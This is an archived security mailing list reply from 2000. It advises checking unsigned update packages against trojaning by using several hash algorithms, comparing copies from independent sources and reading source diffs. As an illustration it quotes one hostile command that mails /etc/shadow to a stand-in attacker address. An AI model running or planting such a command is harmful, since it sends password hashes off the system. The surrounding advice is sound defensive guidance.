Mailinglist Archive: opensuse-security (601 mails)

< Previous Next >
Re: [suse-security] autorpm and latest secure files
  • From: Gerhard Sittig <Gerhard.Sittig@xxxxxxx>
  • Date: Fri, 11 Aug 2000 20:42:31 +0200
  • Message-id: <20000811204231.F261@xxxxxxxxxxxxx>
On Thu, Aug 10, 2000 at 21:25 +0200, Thomas Forbriger wrote:
>
> What are the recomended steps to do security updates from FTP
> when there is no PGP signature in the files? You know there was
> this incident with tripwire on the dutch server that was hacked
> and trojaned as far as I remember. Is there a reason to worry
> about somebody being able to hack and trojan the security
> updates supplied via ftp AND to hack an change the md5 sums
> provided by SuSE at the same time? Or is this coincidence too
> far from being probable?

The solution would be to combine several methods of checking.
Even if an attacker can compromise the data in a way that one
algo still fits (MD5 is not 100% secure after all -- how do you
want to have unique fingerprints for *any* data when you only
have 128 bits to store them?) a second one (SHA1, RIPEMD160)
probably fails.

If you use tripwire, put another "tripwire alike" besides it. If
you have an update package with no sig to check against, get it
from different (independent) places and compare them. If the
update is available in source form, try to read the diff against
the former version. Even if you don't know the internals
exactly, you would have recognized some unexpected "mail
attacker@somewhere < /etc/shadow" commands in a compromised tcpd
package.

Don't rely on a single source, double check for consistency what
you get from different directions. Make use of every hurdle you
can stack up instead of thinking "one obstacle in the chain
should suffice".

And don't believe in "automated security". I feel quite strong
about that automatic updates won't work without heavy human
supervision. :) Having your system (potentially) damaged by a
simple minded program sucking in every update unchecked just
because "the file was there and I felt like applying it" is not
fun. When something breaks, *I* want to be the reason why. :>


virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@xxxxxxx
--
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.

< Previous Next >
Follow Ups